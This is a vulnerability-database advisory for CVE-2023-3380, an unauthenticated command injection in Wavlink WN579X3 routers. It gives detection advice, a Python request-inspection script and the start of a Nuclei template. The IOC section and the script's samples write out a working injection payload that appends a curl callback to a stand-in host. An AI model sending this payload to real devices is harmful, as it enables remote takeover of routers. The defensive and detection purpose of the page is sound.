CVE-2023-3380
Published 2023-06-23
Priority P271 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.88% (88.9th percentile)
A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the component Ping Test. The manipulation of the argument pingIp leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232236. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavlink | wn579x3 | — | — |
| wavlink | wn579x3_firmware | <= 2023-06-15 | — |
Detection & IOCs (extracted from sources)
command: POST /cgi-bin/adm.cgi HTTP/1.1
command: page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
path: /ping.shtml
- Fingerprint target by checking for WAVLINK-specific strings in the HTTP response body before attempting exploitation.
- Detect exploitation attempts by monitoring POST requests to /cgi-bin/adm.cgi with the parameter 'pingIp' containing shell metacharacters (e.g., semicolons, encoded as %3B) indicative of command injection.
- Alert on POST requests to /cgi-bin/adm.cgi with Content-Type: application/x-www-form-urlencoded and body containing 'page=ping_test' combined with shell injection characters in the pingIp parameter.
- Use Shodan to identify exposed WAVLINK WN579X3 devices for proactive asset discovery and patching prioritization.
- The vulnerability is unauthenticated (PR:N), so any external IP can trigger it; monitor for unexpected outbound connections (e.g., curl/wget) originating from the router process after a POST to adm.cgi.
- The exploit payload uses an out-of-band interaction (interactsh) to confirm RCE; detection based solely on HTTP response status 200 is insufficient, and OOB callback monitoring is required for reliable confirmation.
- The vulnerability affects Wavlink WN579X3 firmware up to version 20230615; devices on this or earlier firmware versions are confirmed vulnerable.
- The Nuclei template uses a two-step flow: first confirming the target is a WAVLINK device, then sending the exploit. Single-step detections without the fingerprint check may produce false positives.
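The request-level check described in the detection notes above, as an added example (not taken from the page's sources or the Nuclei template): it percent-decodes the form body and flags a pingIp value that contains shell metacharacters or is not a plain host or IP. The function name, the allowlist pattern and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Characters a shell treats specially; a ping target never needs any of them.
SHELL_META = set(";|&`$(){}<>\\\n\r'\" ")
# Allowlist (assumption): hostname, IPv4 or IPv6 literal characters only.
SAFE_TARGET = re.compile(r"[A-Za-z0-9.:-]{1,253}")

def inspect_request(method, path, content_type, body):
    """Return a list of findings for one HTTP request; an empty list means clean."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/cgi-bin/adm.cgi":
        return []
    if "application/x-www-form-urlencoded" not in content_type.lower():
        return []
    # parse_qs percent-decodes, so %3B becomes ';' and '+' becomes a space
    # before the value is inspected. Splitting only on '&' keeps a raw ';' intact.
    form = parse_qs(body, keep_blank_values=True, separator="&")
    if "ping_test" not in form.get("page", []):
        return []
    findings = []
    for value in form.get("pingIp", []):
        meta = sorted(SHELL_META.intersection(value))
        if meta:
            findings.append(f"pingIp contains shell metacharacters {meta}: {value!r}")
        elif not SAFE_TARGET.fullmatch(value):
            findings.append(f"pingIp is not a plain host or IP: {value!r}")
    return findings

# Constructed sample requests: (method, path, content type, body).
SAMPLES = [
    ("POST", "/cgi-bin/adm.cgi", "application/x-www-form-urlencoded",
     "page=ping_test&CCMD=4&pingIp=192.0.2.10"),
    ("POST", "/cgi-bin/adm.cgi", "application/x-www-form-urlencoded",
     "page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl"
     "+http%3A%2F%2Fcallback.example.invalid"),
    ("GET", "/ping.shtml", "", ""),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[3] or sample[1], "->", inspect_request(*sample) or "clean")
```

Because the check works on the decoded value and an allowlist, it also catches separators other than the semicolon used in the published payload.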
CVSS provenance
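| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 5.8 | MEDIUM | AV:N/AC:L/Au:M/C:P/I:P/A:P |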
No detection rules found.
Nuclei
WAVLINK WN579X3 - Remote Command Execution
nuclei·CVSS 9.8
Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
Template:
```yaml
id: CVE-2023-3380

info:
  name: WAVLINK WN579X3 - Remote Command Execution
  author: pussycat0x
  severity: critical
  description: |
    Remote Command Execution vulnerability in WAVLINK WN579X3 routers via pingIp parameter in /cgi-bin/adm.cgi.
  impact: |
    Unauthenticated attackers can execute arbitrary commands through the pingIp parameter in the adm.cgi endpoint, potentially compromising the entire WAVLINK router and intercepting network traffic.
  remediation: |
    Update WAVLINK WN579X3 firmware to a patched version that properly sanitizes the pingIp parameter and prevents command injection in adm.cgi.
  reference:
    - https://github.com/sleepyv
```